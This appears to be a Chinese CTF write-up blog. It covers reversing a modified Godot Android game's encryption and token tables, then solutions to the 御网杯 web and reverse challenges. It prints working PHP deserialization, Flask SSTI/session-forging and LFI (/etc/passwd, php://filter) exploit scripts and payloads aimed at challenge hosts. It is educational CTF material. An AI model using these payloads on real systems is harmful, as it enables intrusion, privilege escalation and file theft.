<p>首先来说一下,这个so不是题目的核心校验so,他更像Godot在安卓里运行的“总管”,负责把Godot引擎在Android上跑起来、把项目资源定位到、把加密资源解开、把脚本和扩展加载进去,最后把控制权交给游戏逻辑。</p> <p>sub_3CD373C是项目装载前的准备工作</p> <ul> <li>统一路径分隔符</li> </ul> <p><img src="./images/img-04.png" alt="Image" /></p> <ul> <li> <p>看有没有 res://project.godot</p> </li> <li> <p>看有没有 res://project.binary</p> </li> </ul> <p><img src="./images/img-05.png" alt="Image" /></p> <p>所以它本质上是在回答:</p> <p>“我要从哪个目录/哪个包,把 Godot 项目资源读出来?”</p> <p>当某个资源真正被打开时,才进入“加密资源链”</p> <p>这时就轮到 PackedSourcePCK 那一支了,函数在sub_3805698</p> <p><img src="./images/img-06.png" alt="Image" /></p> <p><img src="./images/img-07.png" alt="Image" /></p> <p>再跳到sub_3805E9C,是包装层,准备 key 和参数</p> <p><img src="./images/img-08.png" alt="Image" /></p> <p>真正的加密核心在这里</p> <p><img src="./images/img-09.png" alt="Image" /></p> <p>它做的事是:</p> <ul> <li> <p>读取文件头</p> </li> <li> <p>取前 16 字节 MD5</p> </li> <li> <p>取 8 字节明文长度</p> </li> <li> <p>取 16 字节 IV</p> </li> <li> <p>剩下的是密文</p> </li> <li> <p>用 32 字节 key 做 AES-256-CFB128</p> </li> <li> <p>解出来之后再校验 MD5</p> </li> </ul> <p>到这里我其实认为文件已近完全解密了,但实际上不是,我尝试了最新版本的反编译工具,反编译出来的gd文件只有函数类型,函数内容全是乱码,所以 .gdc 文件解密后虽然格式正确,但里面的 token ID 是题目自定义版。普通工具按原版编号解释,就会把 extends / func / if / return 之类解释错,于是出现:</p> <p><code>var not ``not != &amp;&amp;</code></p> <p>这种乱码源码。</p> <p>经过与agent对话,发现除了一套魔改的AES-256-CFB128加密外,还有一套魔改的token enum,这才导致我之前看不到游戏源码。</p> <p>下面来讲解一下token enum这套逻辑</p> <p>字符串搜索GDScriptTokenizerBuffer</p> <p><img src="./images/img-10.png" alt="Image" /></p> <p>看sub_148F66c函数</p> <p><img src="./images/img-11.png" alt="Image" /></p> <p>核心逻辑是读取 .gdc 里的 token ID,然后按题目自己的表解释。</p> <p>最后整理出来的映射大概是:</p> <pre><code>题目 token ID 真实 Godot token ------------------------------------ 0 EMPTY 1 NEWLINE 2 INDENT 3 DEDENT 4..7 PI / TAU / INF / NAN 11 ANNOTATION 12 IDENTIFIER 13 LITERAL 14..49 原版 token 4..39 51..83 原版 token 40..72 84..98 原版 token 73..87 99 EOF </code></pre> <p>换成更好理解的公式:</p> <pre><code>题目 14..49 -&gt; 原版 = 题目ID - 10 题目 51..98 -&gt; 原版 = 题目ID - 11 </code></pre> <p>特殊值单独处理:</p> <pre><code>11 -&gt; 1 12 -&gt; 2 13 -&gt; 3 99 -&gt; EOF </code></pre> <p>而普通 GDRE Tools 不知道这件事,它看到 81 会按官方表理解,自然就反编译错。</p> <p>修复编号</p> <pre><code>from __future__ import annotations import argparse import shutil import struct from pathlib import Path import zstandard as zstd TOKEN_BYTE_MASK = 0x80 TOKEN_MASK = 0x7F def custom_to_stock_token(token: int) -&gt; int: """Map this challenge's modified GDScript token ids back to Godot 4.5 ids.""" if token == 0: return 0 # EMPTY if token == 1: return 88 # NEWLINE if token == 2: return 89 # INDENT if token == 3: return 90 # DEDENT if 4 &lt;= token &lt;= 7: return token + 87 # PI, TAU, INF, NAN if token == 11: return 1 # ANNOTATION if token == 12: return 2 # IDENTIFIER if token == 13: return 3 # LITERAL if 14 &lt;= token &lt;= 49: return token - 10 # operators if token == 50: return 98 # ERROR if 51 &lt;= token &lt;= 83: return token - 11 # keywords if 84 &lt;= token &lt;= 98: return token - 11 # punctuation if token == 99: return 99 # EOF return token def u32(raw: bytes | bytearray, off: int) -&gt; int: return struct.unpack_from("&lt;I", raw, off)[0] def skip_string(raw: bytes | bytearray, off: int) -&gt; int: length = u32(raw, off) return off + 4 + length * 4 def skip_padded_utf8(raw: bytes | bytearray, off: int, length: int) -&gt; int: return off + ((length + 3) &amp; ~3) def skip_variant(raw: bytes | bytearray, off: int) -&gt; int: typ = u32(raw, off) off += 4 base = typ &amp; 0xFFFF is64 = bool(typ &amp; 0x10000) if base in (0,): return off if base in (1,): return off + 4 if base in (2, 3): return off + (8 if is64 else 4) if base in (4, 21, 22): length = u32(raw, off) off += 4 return skip_padded_utf8(raw, off, length) raise ValueError(f"unsupported Variant type 0x{typ:x} at 0x{off - 4:x}") def parse_token_stream(raw: bytes | bytearray, off: int, token_count: int) -&gt; int | None: cur = off for _ in range(token_count): if cur &gt;= len(raw): return None token = raw[cur] &amp; TOKEN_MASK if token &gt; 99: return None if raw[cur] &amp; TOKEN_BYTE_MASK: if cur + 8 &gt; len(raw): return None cur += 8 else: if cur + 5 &gt; len(raw): return None cur += 5 return cur if cur == len(raw) else None def find_token_stream(raw: bytes | bytearray, min_off: int, token_line_count: int, token_count: int) -&gt; int: maps_size = token_line_count * 16 # Prefer aligned candidates because the constants and line/column maps are u32-based. for maps_off in range((min_off + 3) &amp; ~3, len(raw) - maps_size + 1, 4): token_off = maps_off + maps_size if parse_token_stream(raw, token_off, token_count) is not None: return token_off # Fallback for malformed alignment guesses. for maps_off in range(min_off, len(raw) - maps_size + 1): token_off = maps_off + maps_size if parse_token_stream(raw, token_off, token_count) is not None: return token_off raise ValueError("could not locate token stream") def patch_gdc(data: bytes) -&gt; tuple[bytes, int]: if data[:4] != b"GDSC": raise ValueError("not a GDSC file") if len(data) &lt; 12: raise ValueError("truncated GDSC file") version = data[4:8] declared_raw_len = u32(data, 8) raw = bytearray(zstd.ZstdDecompressor().decompress(data[12:])) if declared_raw_len != len(raw): raise ValueError(f"raw length mismatch: header={declared_raw_len} actual={len(raw)}") identifier_count = u32(raw, 0) constant_count = u32(raw, 4) token_line_count = u32(raw, 8) token_count = u32(raw, 12) off = 16 for _ in range(identifier_count): off = skip_string(raw, off) constants_off = off try: for _ in range(constant_count): off = skip_variant(raw, off) token_off = off + token_line_count * 16 if parse_token_stream(raw, token_off, token_count) is None: raise ValueError("parsed constants did not lead to a valid token stream") except Exception: token_off = find_token_stream(raw, constants_off, token_line_count, token_count) patched = 0 off = token_off for _ in range(token_count): token_off = off if raw[off] &amp; TOKEN_BYTE_MASK: encoded = u32(raw, off) old = encoded &amp; TOKEN_MASK new = custom_to_stock_token(old) struct.pack_into("&lt;I", raw, off, (encoded &amp; ~TOKEN_MASK) | new) off += 8 else: old = raw[off] &amp; TOKEN_MASK new = custom_to_stock_token(old) raw[off] = (raw[off] &amp; ~TOKEN_MASK) | new off += 5 if old != new: patched += 1 if off != len(raw): raise ValueError(f"trailing bytes after token stream: {len(raw) - off}") compressed = zstd.ZstdCompressor(level=19).compress(bytes(raw)) return b"GDSC" + version + struct.pack("&lt;I", len(raw)) + compressed, patched def main() -&gt; int: parser = argparse.ArgumentParser(description="Patch modified Godot 4.5 GDScript token ids back to stock ids.") parser.add_argument("src", type=Path, help="source file or directory") parser.add_argument("dst", type=Path, help="output file or directory") args = parser.parse_args() src = args.src.resolve() dst = args.dst.resolve() if src.is_file(): dst.parent.mkdir(parents=True, exist_ok=True) out, count = patch_gdc(src.read_bytes()) dst.write_bytes(out) print(f"[patch] {src.name}: tokens={count}") return 0 for path in src.rglob("*"): if not path.is_file(): continue rel = path.relative_to(src) out_path = dst / rel out_path.parent.mkdir(parents=True, exist_ok=True) if path.suffix.lower() == ".gdc": try: out, count = patch_gdc(path.read_bytes()) except Exception as exc: shutil.copy2(path, out_path) print(f"[skip] {rel}: {exc}") else: out_path.write_bytes(out) print(f"[patch] {rel}: tokens={count}") else: shutil.copy2(path, out_path) return 0 if __name__ == "__main__": raise SystemExit(main()) </code></pre> <p>这个时候gdc可以正常反编译为gd文件了</p> <p>token.gd,是token的生成逻辑,长度恒定为8chars</p> <pre><code>extends Label var _r8: = RandomNumberGenerator.new() var _sc0 = 0 var _hx: = "0123456789" + "abcdef" var _tl: = 4 * 2 func _mk(n: int) -&gt; String: var _buf: = "" var _mx: = _hx.length() - 1 var _j: = 0 while _j &lt; n: var _p: = _r8.randi_range(0, _mx) _buf += _hx[_p] _j += 1 return _buf func _ready() -&gt; void : _r8.randomize() var _pfx: = "Token: " var _val: = _mk(_tl) text = _pfx + _val var _out: = text print(_out) </code></pre> <p>trigger1.gd的逻辑就是示例flag的生成逻辑</p> <pre><code>extends Area3D signal collided_with(name) var _f0: = false var _f1: = false var _tv: = 0.0 var _ix: = 0 var _gx func _m3(): if $MeshInstance3D == null: return $MeshInstance3D.rotation.y += _rv * 1.0 var _yp = sin(_tv) * 0.2 $MeshInstance3D.position.y = _yp var _sc = 1.0 + sin(_tv * 3.0) * 0.1 $MeshInstance3D.scale = Vector3(_sc, _sc, _sc) var _rv: = 0.0 func _kc(): var _bp: = get_overlapping_bodies() if _bp.size() &lt; 1: return var _np: = str(get_path()) var _t1: = "/root/" + "TownScene" + "/Trigger1" if _np != _t1: return var _lb: = get_node(NodePath("/root/TownScene/Label2")) var _px: = "flag{" var _sx: = "sec2026" + "_PART0_" + "example" + "}" _lb.text = _px + _sx func _ready(): connect("body_entered", Callable(self, "_on_body_entered")) _gx = GameExtension.new() func _on_body_entered(_b): pass func _process(_d): _gx.Tick() _rv = _d _tv += _d * 2.0 _m3() _kc() </code></pre> <p>trigger2.gd的源码,也就是part1的生成逻辑</p> <pre><code>extends Area3D signal collided_with(name) var _gx = GameExtension.new() var _tv: = 0.0 var _ix: = 0 func _h2b(_s: String) -&gt; PackedByteArray: var _r: = PackedByteArray() var _n: = _s.length() var _j: = 0 while _j &lt; _n: _r.append(_s.substr(_j, 2).hex_to_int()) _j += 2 return _r func _b2h(_ba: PackedByteArray) -&gt; String: var _r: = "" for _v in _ba: _r += "%02x" % _v return _r func _xb(_a: PackedByteArray, _b: PackedByteArray) -&gt; PackedByteArray: var _r: = PackedByteArray() var _n: = _a.size() var _j: = 0 while _j &lt; _n: _r.append(_a[_j] ^ _b[_j]) _j += 1 return _r func _rf(_bl: PackedByteArray, _ky: PackedByteArray, _rn: int) -&gt; PackedByteArray: var _r: = PackedByteArray() var _ks: = _ky.size() for _j in _bl.size(): var _v: = _bl[_j] ^ _ky[(_j + _rn) % _ks] _v = (_v * 7 + _rn) &amp; 255 _v = ((_v &lt;&lt; 3) | (_v &gt;&gt; 5)) &amp; 255 _r.append(_v) return _r func _fe(_th: String) -&gt; String: var _da: = _h2b(_th) assert (_da.size() == (2 &lt;&lt; 1)) var _hl: = 2 var _lo: = _da.slice(0, _hl) var _hi: = _da.slice(_hl, _hl * 2) var _kp: = ("Sec" + "2026" + "_God" + "ot").to_utf8_buffer() var _rn: = 0 while _rn &lt; (4 * 2): var _fv: = _rf(_hi, _kp, _rn) var _nr: = _xb(_lo, _fv) _lo = _hi _hi = _nr _rn += 1 var _ot: = PackedByteArray() _ot.append_array(_lo) _ot.append_array(_hi) return "sec" + "2026" + "_PART" + "1_" + _b2h(_ot) func _ready() -&gt; void : body_entered.connect(_w7) func _w7(_ar): var _lb: = get_node(NodePath("/root/TownScene/" + "Label2")) var _lt: = get_node(NodePath("/root/TownScene/" + "Label")) var _tx: = str(_lt.text) var _tk: = _tx.substr(3 + 4) var _pf: = "flag{" var _rs: = _fe(_tk) _lb.text = _pf + _rs + "}" + " " func _m3(_d: float): if $MeshInstance3D == null: return $MeshInstance3D.rotation.y += _d * 1.0 var _yp = sin(_tv) * 0.2 $MeshInstance3D.position.y = _yp var _sc = 1.0 + sin(_tv * 3.0) * 0.1 $MeshInstance3D.scale = Vector3(_sc, _sc, _sc) func _process(_d: float) -&gt; void : _gx.Tick() _tv += _d * 2.0 _m3(_d) </code></pre> <ol> <li>PART1 — Feistel cipher(trigger2.gd)</li> </ol> <p>1.1 GDScript 来源</p> <ul> <li> <p>触发器:第 2 个 trigger(车撞进 Trigger2 的 Area3D)</p> </li> <li> <p>完整算法在 GDScript 里实现,不依赖 native</p> </li> <li> <p>显示位置:/root/TownScene/Label2</p> </li> <li> <p>输出格式:flag{sec2026_PART1_&lt;8 chars hex&gt;}</p> </li> </ul> <p>1.2 输入 / 输出</p> <ul> <li> <p>输入:从 Label 文本 Token: XXXXXXXX 截掉前 7 字节 → 拿到 8 字符 hex</p> </li> <li> <p>bytes.fromhex(token) → 4 字节</p> </li> <li> <p>拆成 lo (2B) + hi (2B)</p> </li> <li> <p>输出:4 字节 → 8 字符 hex(小写)</p> </li> </ul> <p>1.3 Feistel 结构</p> <ul> <li> <p>Key:b"Sec2026_Godot"(13 字节,循环使用)</p> </li> <li> <p>轮数:8</p> </li> <li> <p>Round function(每轮对 hi 做 F(hi),再 lo = hi, hi = old_lo XOR F(hi)):</p> </li> </ul> <pre><code>for rn in range(8): fv = [] for j in range(2): # half-block 长度 = 2 v = hi[j] ^ key[(j + rn) % 13] # 1) XOR key v = (v * 7 + rn) &amp; 0xFF # 2) 仿射混淆 v = ((v &lt;&lt; 3) | (v &gt;&gt; 5)) &amp; 0xFF # 3) ROL by 3 fv.append(v) nr = [lo[j] ^ fv[j] for j in range(2)] # 4) 异或回 lo lo, hi = hi, nr # 5) Feistel 交换 out = bytes(lo + hi).hex() </code></pre> <p>part2的相关逻辑在(trigger3.gd + libsec2026.so)</p> <p>先看源码</p> <pre><code>extends Area3D signal collided_with(name) var _gx = GameExtension.new() var _tv: = 0.0 var _ix: = 0 var _kd: = PackedByteArray() func _h2b(_s: String) -&gt; PackedByteArray: var _r: = PackedByteArray() var _p: = 0 var _e: = _s.length() while _p &lt; _e: var _ch: = _s.substr(_p, 2) _r.append(_ch.hex_to_int()) _p += 2 return _r func _b2h(_ba: PackedByteArray) -&gt; String: var _r: = "" var _p: = 0 while _p &lt; _ba.size(): _r += "%02x" % _ba[_p] _p += 1 return _r func _xb(_a: PackedByteArray, _b: PackedByteArray) -&gt; PackedByteArray: var _r: = PackedByteArray() for _j in _a.size(): _r.append(_a[_j] ^ _b[_j]) return _r func _rf(_bl: PackedByteArray, _ky: PackedByteArray, _rn: int) -&gt; PackedByteArray: var _r: = PackedByteArray() var _km: = _ky.size() var _j: = 0 while _j &lt; _bl.size(): var _v: = _bl[_j] _v = _v ^ _ky[(_j + _rn) % _km] var _t: = (_v * (3 + 4) + _rn) _v = _t &amp; 255 var _sl: = (_v &lt;&lt; 3) &amp; 255 var _sr: = (_v &gt;&gt; 5) &amp; 255 _v = _sl | _sr _r.append(_v) _j += 1 return _r func _ready() -&gt; void : body_entered.connect(_w7) var _ks: = "Sec2026" var _ke: = "_Godot" _kd = (_ks + _ke).to_utf8_buffer() func _w7(_ar): var _lb: = get_node(NodePath("/root/" + "TownScene/Label2")) var _lt: = get_node(NodePath("/root/" + "TownScene/Label")) var _raw: = str(_lt.text).substr(7) var _buf: = _raw.to_utf8_buffer() var _pf: = "flag{" var _mi: = "sec2026" var _su: = "_PART2_" var _rv: = _gx.Process(_buf) _lb.text = _pf + _mi + _su + _rv + "}" + " " func _m3(_d: float): if $MeshInstance3D == null: return $MeshInstance3D.rotation.y += _d * 1.0 var _yp = sin(_tv) * 0.2 $MeshInstance3D.position.y = _yp var _sc = 1.0 + sin(_tv * (1.5 * 2.0)) * 0.1 $MeshInstance3D.scale = Vector3(_sc, _sc, _sc) func _process(_d: float) -&gt; void : _gx.Tick() _tv += _d * (1.0 * 2.0) _m3(_d) </code></pre> <ul> <li> <p>触发器:第 3 个 trigger(Trigger3)</p> </li> <li> <p>GDScript 端只做一件事:把 Token 转 PackedByteArray,丢给 native</p> </li> </ul> <p>var _buf = _raw.to_utf8_buffer() # 8 字节 ASCII</p> <p>var _rv = _gx.Process(_buf) # 调 native</p> <p>_lb.text = "flag{" + "sec2026" + "_PART2_" + _rv + "}"</p> <ul> <li> <p>显示位置:/root/TownScene/Label2</p> </li> <li> <p>输出格式:flag{sec2026_PART2_&lt;32 chars uppercase hex&gt;}</p> </li> </ul> <p>IDA打开so文件进行分析,里面的无法反汇编的片段有很多,是控制流平坦化,第一次遇到arm64汇编语言的混淆,这个so里面的cff的风格是OLLVM</p> <p>结合ai去控制流平坦化的过程总结</p> <pre><code>整体路线 原始 .so(混淆 + reloc 未填) │ ① 应用 reloc,让派发表指向真实地址 │ ② 线性反汇编,得到 raw asm(每条 4 字节都解出来) │ ③ 手工 / 脚本提取 dispatcher:识别 controller 寄存器 │ ④ 模拟 controller 状态机:解出 case 编号 → 下一个 case 的映射 │ ⑤ 把碎片 case-block 按真实顺序拼回去(虚拟去平坦化) │ ⑥ 模式匹配:识别每段做什么(XOR / S-Box 查表 / GF mul / shiftrows) │ ⑦ Unicorn emu 验证:跑真实输入,对比 Python 实现 </code></pre> <p>这一块很杂,先调到part3flag的生成逻辑</p> <p>未完待续!!</p> 御网杯 WriteUphttps://blog-5w0.pages.dev/posts/yuwangbei/https://blog-5w0.pages.dev/posts/yuwangbei/御网杯 WriteUp CTF WriteUpSat, 23 May 2026 00:00:00 GMT<h1>御网杯</h1> <h1>Web</h1> <h2>WEB-Snake_Game</h2> <h3>题目截图</h3> <p><img src="./images/img-01.png" alt="Figure 1" /></p> <h3>解题思路</h3> <p>打开首页后,页面只有一个 Snake Game,前端逻辑全写在页面内联 JavaScript 里。关键点在这个函数:</p> <pre><code>function checkWin(s) { let formData = new FormData(); formData.append('score', s); fetch('index.php', { method: 'POST', body: formData }) .then(r =&gt; r.json()) .then(data =&gt; { if(data.status === 'success') { msgEl.innerText = data.flag; } }); } </code></pre> <p>可以看到:</p> <ol> <li> <p>游戏结束后,前端只是把 score 提交给 index.php</p> </li> <li> <p>服务端返回 JSON</p> </li> <li> <p>前端直接把返回的 flag 显示出来</p> </li> </ol> <p>这说明核心漏洞是:后端只校验提交的分数,没有校验分数是否真的通过游戏产生</p> <p>利用方式</p> <p>直接伪造一个 score=300 的请求即可,然后拿到flag。</p> <p><img src="./images/img-02.png" alt="Figure 2" /></p> <h2>WEB-PHP_Payment</h2> <h3>题目截图</h3> <p><img src="./images/img-03.png" alt="Figure 3" /></p> <h3>解题思路</h3> <p>先审附件源码,关键点有两处。</p> <ol> <li>在 apply_coupon.php 中,服务端会对用户提交的 coupon 参数先做 base64_decode(),随后直接执行 unserialize():</li> </ol> <pre><code>$decoded = base64_decode($couponData); $promo = @unserialize($decoded); </code></pre> <p>这意味着这里存在用户可控的 PHP 反序列化。</p> <ol> <li>在 models.php 中定义了 PromoManager 类,它的析构函数会把对象属性 promo_credit 直接累加到 session 余额:</li> </ol> <pre><code>function __destruct() { if(isset($this-&gt;promo_credit) &amp;&amp; is_numeric($this-&gt;promo_credit)) { $_SESSION['balance'] += intval($this-&gt;promo_credit); } } </code></pre> <p>也就是说,只要我们伪造一个 PromoManager 对象,并把 promo_credit 设成足够大的数字,在反序列化结束、对象销毁时就能给自己“充值”。</p> <p>再看 buy.php,其中 flag 商品价格是 99999 金币:</p> <p>初始余额只有 20,因此正常无法购买,但通过优惠券反序列化可以直接把余额加到足够大。</p> <p>利用链非常简单:</p> <ol> <li> <p>访问首页,拿到一个新的 PHPSESSID</p> </li> <li> <p>构造 PromoManager 对象,令 promo_credit=100000</p> </li> <li> <p>将该对象序列化后再 Base64 编码,作为 coupon 提交给 /api/apply_coupon.php</p> </li> <li> <p>同一 session 下请求 /buy.php,传 item=flag</p> </li> <li> <p>余额足够后成功购买,返回 flag</p> </li> </ol> <p>构造 Payload</p> <p>PromoManager 有两个公开属性:</p> <ul> <li> <p>promo_credit</p> </li> <li> <p>promo_code</p> </li> </ul> <p>因此可构造如下序列化字符串:</p> <pre><code>O:12:"PromoManager":2:{s:12:"promo_credit";i:100000;s:10:"promo_code";s:3:"VIP";} </code></pre> <p>对应 Base64 为:</p> <pre><code>TzoxMjoiUHJvbW9NYW5hZ2VyIjoyOntzOjEyOiJwcm9tb19jcmVkaXQiO2k6MTAwMDAwO3M6MTA6InByb21vX2NvZGUiO3M6MzoiVklQIjt9 </code></pre> <p>用下面的脚本</p> <pre><code>from __future__ import print_function import base64 import re import sys try: from urllib.request import HTTPCookieProcessor, Request, build_opener from urllib.parse import urlencode from http.cookiejar import CookieJar except ImportError: from urllib2 import HTTPCookieProcessor, Request, build_opener from urllib import urlencode from cookielib import CookieJar TARGET = sys.argv[1] if len(sys.argv) &gt; 1 else "http://120.27.146.76:13228" def build_coupon(credit=100000, code="VIP"): payload = ( 'O:12:"PromoManager":2:{{' 's:12:"promo_credit";i:{credit};' 's:10:"promo_code";s:{code_len}:"{code}";' "}}" ).format( credit=credit, code_len=len(code), code=code, ) return base64.b64encode(payload.encode()).decode() def extract_flags(text): return re.findall(r"flag**\{**[^}]+**\}**", text) def decode_text(data): if hasattr(data, "decode"): return data.decode("utf-8", "ignore") return data def http_get(opener, url): req = Request(url) return decode_text(opener.open(req, timeout=10).read()) def http_post(opener, url, data): body = urlencode(data) if hasattr(body, "encode"): body = body.encode("utf-8") req = Request(url, data=body) return decode_text(opener.open(req, timeout=10).read()) def main(): jar = CookieJar() opener = build_opener(HTTPCookieProcessor(jar)) http_get(opener, "{}/".format(TARGET)) coupon = build_coupon() resp = http_post( opener, "{}/api/apply_coupon.php".format(TARGET), {"coupon": coupon}, ) print("[*] apply_coupon response:", resp) resp = http_post( opener, "{}/buy.php".format(TARGET), {"item": "flag"}, ) print("[*] buy response:", resp) flags = extract_flags(resp) if not flags: print("[-] No flag found.") return print("[+] Found flags:") for idx, flag in enumerate(flags, 1): print(" {}. {}".format(idx, flag)) print("[+] Likely real flag: {}".format(flags[0])) if __name__ == "__main__": main() </code></pre> <p>运行拿到flag</p> <p><img src="./images/img-04.png" alt="Figure 4" /></p> <h2>WEB-TaxSystem_SSTI</h2> <h3>题目截图</h3> <p><img src="./images/img-05.png" alt="Figure 5" /></p> <h3>解题思路</h3> <p>在 init_db.py 可以看到系统初始化了一个账号:</p> <pre><code>admin / 123456 </code></pre> <p>在 app.py 的 preview() 逻辑里,只有当 state == 'AUDIT_PENDING' 时,才会走“官方审计报告”模板渲染分支。这个分支把 custom_footer 直接拼进 HTML,再交给 app.py (line 127) 的 render_template_string() 渲染,这就形成了标准 SSTI。</p> <p>黑名单在 app.py ,虽然过滤了 __、引号、request、session 等关键字,但没有过滤 config,所以 {{config}} 可以直接用。</p> <p>此外,app.py 的 /admin/vault 只校验:</p> <pre><code>if session.get('role') != 'tax_inspector': </code></pre> <p>也就是说,只要能伪造 Flask session,就能越权进后台。</p> <p>要注意一点:config.py 里的默认 SECRET_KEY 不是远端实际值,所以不能直接拿源码默认值伪造 cookie,必须先通过 SSTI 泄露线上真实密钥。</p> <p>接下来我们去利用</p> <ol> <li>登录系统,账号密码为:</li> </ol> <pre><code>admin / 123456 </code></pre> <p><img src="./images/img-06.png" alt="Figure 6" /></p> <ol> <li>通过 /api/import 修改自己的 profile:</li> </ol> <pre><code>{ "profile_id": 1, "data": { "state": "AUDIT_PENDING", "custom_footer": "{{config}}" } } </code></pre> <ol> <li>访问 /preview/1,页面会回显 Flask 配置,拿到远端真实密钥:</li> </ol> <pre><code>SECRET_KEY = secret_tax_key_2026_xoxo </code></pre> <ol> <li>用这个 SECRET_KEY 伪造 Flask session,把会话内容改成:</li> </ol> <pre><code>{"role": "tax_inspector", "user_id": 1} </code></pre> <ol> <li>带着伪造后的 session cookie 访问:</li> </ol> <pre><code>/admin/vault </code></pre> <p>可以用下面这个脚本</p> <pre><code>import re import html import requests from flask import Flask from flask.sessions import SecureCookieSessionInterface BASE = "http://120.27.146.76:13583" USERNAME = "admin" PASSWORD = "123456" PROFILE_ID = 1 def get_secret_key(): s = requests.Session() r = s.post( BASE + "/login", data={"username": USERNAME, "password": PASSWORD}, allow_redirects=True, timeout=10, ) if r.status_code != 200: raise RuntimeError(f"login failed: {r.status_code}") r = s.post( BASE + "/api/import", json={ "profile_id": PROFILE_ID, "data": { "state": "AUDIT_PENDING", "custom_footer": "{{config}}", }, }, timeout=10, ) if r.status_code != 200: raise RuntimeError(f"import failed: {r.status_code} {r.text}") r = s.get(BASE + f"/preview/{PROFILE_ID}", timeout=10) text = html.unescape(r.text) m = re.search(r"SECRET_KEY': '([^']+)'", text) if not m: raise RuntimeError("SECRET_KEY not found in preview response") return m.group(1) def forge_session(secret_key): app = Flask(__name__) app.secret_key = secret_key serializer = SecureCookieSessionInterface().get_signing_serializer(app) return serializer.dumps({"role": "tax_inspector", "user_id": 1}) def get_flag(cookie): s = requests.Session() s.cookies.set("session", cookie) r = s.get(BASE + "/admin/vault", timeout=10) if r.status_code != 200: raise RuntimeError(f"vault request failed: {r.status_code}") m = re.search(r'&lt;div class="flag-box"&gt;\s*(.*?)\s*&lt;/div&gt;', r.text, re.S) if not m: raise RuntimeError("flag not found in response") return m.group(1).strip() def main(): secret_key = get_secret_key() print(f"[+] SECRET_KEY: {secret_key}") cookie = forge_session(secret_key) print(f"[+] forged session: {cookie}") flag = get_flag(cookie) print(f"[+] flag: {flag}") if __name__ == "__main__": main() </code></pre> <p><img src="./images/img-07.png" alt="Figure 7" /></p> <h2>WEB-Enterprise_OA</h2> <h3>题目截图</h3> <p><img src="./images/img-08.png" alt="Figure 8" /></p> <h3>解题思路</h3> <p>访问首页可以看到导航链接使用了 <code>module</code> 参数:</p> <pre><code>/?module=public_notices.php /?module=about.php /?module=contact.php </code></pre> <p>说明页面内容很可能是通过 <code>include\(\)</code> 动态加载的,因此优先测试文件包含。</p> <p>先尝试普通目录穿越:</p> <pre><code>/?module=../../etc/passwd </code></pre> <p>返回报错中可以看到,服务端实际尝试包含的是:</p> <pre><code>include(etc/passwd) </code></pre> <p>说明 <code>\.\./</code> 被过滤掉了,继续读取首页源码:</p> <pre><code>/?module=php://filter/convert.base64-encode/resource=/var/www/html/index.php </code></pre> <p>解码后关键代码如下:</p> <pre><code>&lt;?php $module = isset($_GET['module']) ? $_GET['module'] : 'public_notices.php'; $module = str_replace('../', '', $module); ?&gt; ... &lt;?php include($module); ?&gt; </code></pre> <p>问题就在这里:开发者只替换了字符串 <code>\.\./</code>,但没有限制绝对路径。因此虽然相对路径穿越被“抹掉”了,绝对路径仍然可以直接包含系统文件。</p> <p><img src="./images/img-09.png" alt="Figure 9" /></p> <ol> <li>验证任意文件读取</li> </ol> <p>请求:</p> <pre><code>/?module=/etc/passwd </code></pre> <p>成功回显系统账户内容,证明绝对路径包含可用。</p> <ol> <li>读取 flag</li> </ol> <p>结合常见 CTF 文件位置,尝试直接读取:</p> <pre><code>/?module=/flag.txt </code></pre> <p>成功得到 flag。</p> <p><img src="./images/img-10.png" alt="Figure 10" /></p> <h1>Re</h1> <h2>rerere</h2> <h3>题目截图</h3> <p><img src="./images/img-11.png" alt="Figure 11" /></p> <h3>解题思路</h3> <p>ida打开附件,主校验函数在sub_1400014FB</p> <p><img src="./images/img-12.png" alt="Figure 12" /></p> <p>跳转过来</p> <p><img src="./images/img-13.png" alt="Figure 13" /></p> <p>加密逻辑在sub_140001480</p> <p><img src="./images/img-14.png" alt="Figure 14" /></p> <p><code>SBOX</code> 可逆,直接对每个位置求逆即可:</p> <pre><code>input[i] = INV_SBOX[ EXPECTED[i] ] ^ XORKEY[i % 8] </code></pre> <p>关键数据</p> <p><img src="./images/img-15.png" alt="Figure 15" /></p> <p>解题脚本</p> <pre><code>#!/usr/bin/env python3 expected = bytes.fromhex( "a3 5b 4c 0a 0e 98 84 da" "14 e7 0b 91 53 49 4f b6" "a9 ac 0b 49 14 97 4f d5" "b1 96 75 f6 3b a7 84 c5" "a9 c9 06 36 c6 6c".replace(" ", "") ) xorkey = bytes.fromhex("b9 cd ce 30 b8 61 4e aa".replace(" ", "")) sbox = bytes.fromhex(""" c2 23 97 49 83 f6 d3 a7 eb bf 78 c3 29 56 d2 1a 13 bc 21 6a 37 8e 5f 0c b4 46 de e4 6c a2 66 30 0f a4 bb 8c 09 4b 3d 32 42 55 2d 4f f9 77 1b 74 1f 71 7b 9d 73 c4 ab d0 f3 c1 88 07 dc ce ef c0 72 4a 27 81 9b ee c7 28 26 5a 94 54 70 d1 e9 c8 98 36 91 41 b8 3a 79 0a 08 e5 af 80 24 ae 00 19 cc 7a f7 51 7d 69 ec 03 65 25 1c 01 f5 e6 bd d9 59 fe 92 b0 10 6f f0 e3 9f ad 84 f4 a5 33 35 48 53 b1 e0 d8 05 38 18 68 a9 14 c6 3f 61 8a 31 3b ba 2b 4e e2 57 9a f1 ea 64 7e a0 93 b6 da 60 2e 1d 5b 82 34 6d fc cf 7f e7 96 67 43 06 44 c9 4c 40 db fd 4d b5 ed 39 2c b3 17 9e cd fa 6b ca 87 8f 9c 89 0e 63 45 86 aa 5e 95 16 c5 d5 2f a1 f8 99 ff 3c 0d 3e d4 04 76 d7 47 20 8d df 5c 7c a3 1e 8b 15 b9 a8 cb 22 a6 52 d6 fb 5d dd b2 6e e8 f2 e1 2a 58 62 12 11 50 75 b7 ac 90 0b 85 02 be """.replace("\n", "").replace(" ", "")) assert len(set(sbox)) == 256, "SBOX 不是完整置换" inv_sbox = [0] * 256 for i, v in enumerate(sbox): inv_sbox[v] = i flag = bytes(inv_sbox[e] ^ xorkey[i % 8] for i, e in enumerate(expected)) for i, e in enumerate(expected): assert sbox[flag[i] ^ xorkey[i % 8]] == e print(flag.decode()) </code></pre> <p><img src="./images/img-16.png" alt="Figure 16" /></p> <p>flag{1470e2b8be617231cef8d657f4a1cba2}</p> <h2>字节码迷踪</h2> <h3>题目截图</h3> <p><img src="./images/img-17.png" alt="Figure 17" /></p> <h3>解题思路</h3> <p>py逆向,用die查看py版本是3.12</p> <p><img src="./images/img-18.png" alt="Figure 18" /></p> <p>直接用在线网站反编译一下https://pylingual.io/</p> <p><img src="./images/img-19.png" alt="Figure 19" /></p> <p>得到py源码</p> <pre><code># Decompiled with PyLingual 